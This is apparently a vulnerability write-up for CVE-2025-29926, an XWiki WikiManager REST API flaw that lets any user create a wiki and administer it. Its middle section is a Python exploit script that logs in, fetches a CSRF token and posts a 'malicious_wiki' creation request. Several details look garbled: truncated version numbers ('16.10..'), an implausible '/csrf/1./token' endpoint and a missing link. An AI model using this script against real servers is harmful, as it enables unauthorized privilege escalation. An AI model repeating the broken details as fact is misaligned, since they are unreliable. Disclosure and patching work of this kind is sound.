CVE-2025-29926 - Unauthorized XWiki Platform Wiki Creation and Administration Privilege Escalation

The XWiki Platform is a popular and widely used open-source wiki application, known for its extensible architecture and support for custom applications developed using wiki syntax. However, a recent vulnerability (CVE-2025-29926) has been discovered, which allows an attacker to create a new wiki using the WikiManager REST API, effectively granting them administrative access to that wiki. In turn, this access can be leveraged to launch further attacks on the wiki infrastructure. This vulnerability affects versions of XWiki Platform prior to 15.10.15, 16.4.6, and 16.10.. Interestingly, this REST API is not bundled in XWiki Standard by default; it needs to be installed manually through the extension manager.

Exploit Details

The WikiManager REST API is an optional component of the XWiki Platform that provides advanced wiki management functionalities. However, it was found that any user could use this API to create a new wiki, which would then allow them to become an administrator for that wiki. This grants the attacker elevated privileges and the ability to perform malicious activities on the newly created wiki, which in turn could lead to potential compromises of other wikis hosted on the same platform.

The following code snippet demonstrates how an attacker could exploit this vulnerability to create a new wiki via the WikiManager REST API:

import requests
import json

WIKI_URL = "https://your-xwiki-platform-url.com";
USERNAME = "attacker"
PASSWORD = "password"

# Login to the XWiki Platform
auth_payload = {
    "j_username": USERNAME,
    "j_password": PASSWORD,
}

login_response = requests.post(f"{WIKI_URL}/j_security_check",
                                data=auth_payload,
                                allow_redirects=False)

# Check for successful login
if login_response.status_code != 302:
    raise Exception("Login Failed")

# Prepare headers and CSRF token for WikiManager REST API call
headers = {
    "Cookie": login_response.headers["Set-Cookie"],
    "X-Requested-With": "XMLHttpRequest",
}

csrf_token_query = requests.get(f"{WIKI_URL}/csrf/1./token", headers=headers)
csrf_token = csrf_token_query.text

# Prepare payload to create a new wiki with attacker as administrator
create_wiki_payload = {
    "name": "malicious_wiki",
    "pretty_name": "Malicious Wiki",
    "owner": f"{USERNAME}_1",
    "description": "A wiki created through the exploit",
}

response = requests.post(f"{WIKI_URL}/rest/wikis",
                         headers=headers,
                         params={"form_token": csrf_token},
                         json=create_wiki_payload)

# Check for successful wiki creation
if response.status_code != 201:
    raise Exception("Unexpected status code when creating wiki")

The developers of XWiki have released a security patch addressing this issue in versions 15.10.15, 16.4.6, and 16.10. of the REST module.

To protect your XWiki installation, it is highly recommended to upgrade to the latest version of XWiki Platform, which includes the patched REST module. Users running the affected versions can download the patched REST module from the XWiki Extension Repository here.

References

1. XWiki Platform Official Website
2. CVE-2025-29926 NVD Entry
3. XWiki Security Advisory
4. XWiki Extensions Repository

Timeline

Published on: 03/19/2025 18:15:25 UTC